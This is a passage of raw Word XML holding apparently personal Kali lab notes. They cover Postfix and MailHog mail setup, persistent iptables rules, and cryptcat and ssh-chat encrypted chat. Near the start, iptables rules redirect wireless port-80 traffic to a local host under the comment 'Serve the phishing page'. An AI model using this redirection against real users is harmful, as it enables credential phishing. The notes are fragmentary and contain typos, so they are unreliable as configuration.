    <w:p w14:paraId="6F69ED30" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> iptables -F)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBD3DD4" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t>-Hard Reset of the table ^^^^^^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF9BD5D" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> iptables -t </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>nat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> -A PREROUTING -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> wlan0 -p </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>dport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> 80 -j DNAT --to-destination 10.0.0.1:80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE28056" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> iptables -t </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>nat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> -A POSTROUTING -j MASQUERADE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E623E48" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="59FC1E3B" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="3820A19D" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t># Serve the phishing page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E4D841" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t>cd /var/www/fake*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244915C0" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="22D41BF4" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>SMTP Server setup and others (Port 25)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4111C5" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>- To edit the postfix smtp use "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> nano /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>/postfix/main.cf"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615379E5" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="5A784365" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>To start it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52BE6789" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>systemctl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> enable postfix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D96D78C" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="4ED7FB76" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">To test if </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>its</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>on</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> use</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED6C365" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>telnet local 25</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2012D841" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="0DFEF1EF" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">To see if a user has gotten a message use </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="089419C5" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>- mail</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34AD5A08" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>- (MAKE SURE YOU ARE ON THE USER WHEN USING THIS COMMAND)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7963B8F9" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">- (Due to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>MailHog</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> Intercepting all outgoing mail If the relay is still on no messages will be able to send.) AKA: The mail gets trapped by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>MailHog</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> so turn off RELAY to actually send something</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01BC2105" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="294B7A56" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:lastRenderedPageBreak/>
        <w:t>MAILHOG (Port 1025)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA0ED97" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">- To run use </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC79B1C" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t>- ~/go/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>MailHog</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63967888" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">To auto-start </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>MailHog</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> (Did Not do)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9AE0E2" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> nano /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>systemd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>stsyem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>mailhog.service</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="36B21206" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">- Lookup "Chat or Internet for rest" Too long </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>wompwomp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="686A3470" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="4D6A98BC" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>SAVE IPTABLES RULES FOREVER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D723B4B" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>To Save</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72595B4C" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>- Use iptables-persistent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69107582" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="3778E2A8" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>To Save New Rules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339C061F" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>netfilter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>-persistent save</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A3AADB" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="38DE53FF" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">To Manually Reload All Rules </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44493F91" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>netfilter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>-persistent reload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49188706" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="4D00D9DB" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="34B276E2" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>To Monitor Logs From Firewall</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D878B27" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>journalctl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> -k -f | grep *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F222D9" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="4B2FA3D7" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="7DAD541B" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">Secure/encrypted terminal chats </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D808A50" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">- For the Server/Host </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47471EAA" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>cryptcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> -l -p (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>Server_IP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>) (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>Server_Port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>) -k (Password)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E70467D" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t>- "-l" Sets it into listening mode | "-p" Sets the port | "-k" sets the password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="044CDE04" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:lastRenderedPageBreak/>
        <w:t>- For the Client/Connector</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13EDE033" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>cryptcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>Server_IP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>) (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>Server_Port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>) -k (Password)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27BEC677" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>For ssh-chat we start a server through kali and let others connect to it using their device</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD09713" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t xml:space="preserve">- Go to Directory: /home/gdsj05/Downloads/Secure-Chat/ssh-chat </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4940978F" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">TO start use </w:t>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0312C1" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t>- ./ssh-chat --identity ~/.ssh/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>sshchat_rsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> --bind 0.0.0.0:2022</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F34CBA" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t>- For windows machines you can use</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED37AE0" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t>- ssh -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>oHostKeyAlgorithms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>=+ssh-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>rsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>oPubkeyAcceptedAlgorithms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>=+ssh-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>rsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> -p 2022 (Username)@(Server IP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321DAE28" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t>- Or for something permanent (Add this)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37AEF2A6" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t>- C:\Users\&lt;YourUser&gt;\.ssh\config</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9F9409" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t xml:space="preserve">Host </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>sshchat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7DFEECEA" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>HostName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> 192.168.1.178</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D3D06F" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t>Port 2022</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EFFCE1" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t>User chat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C51350" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
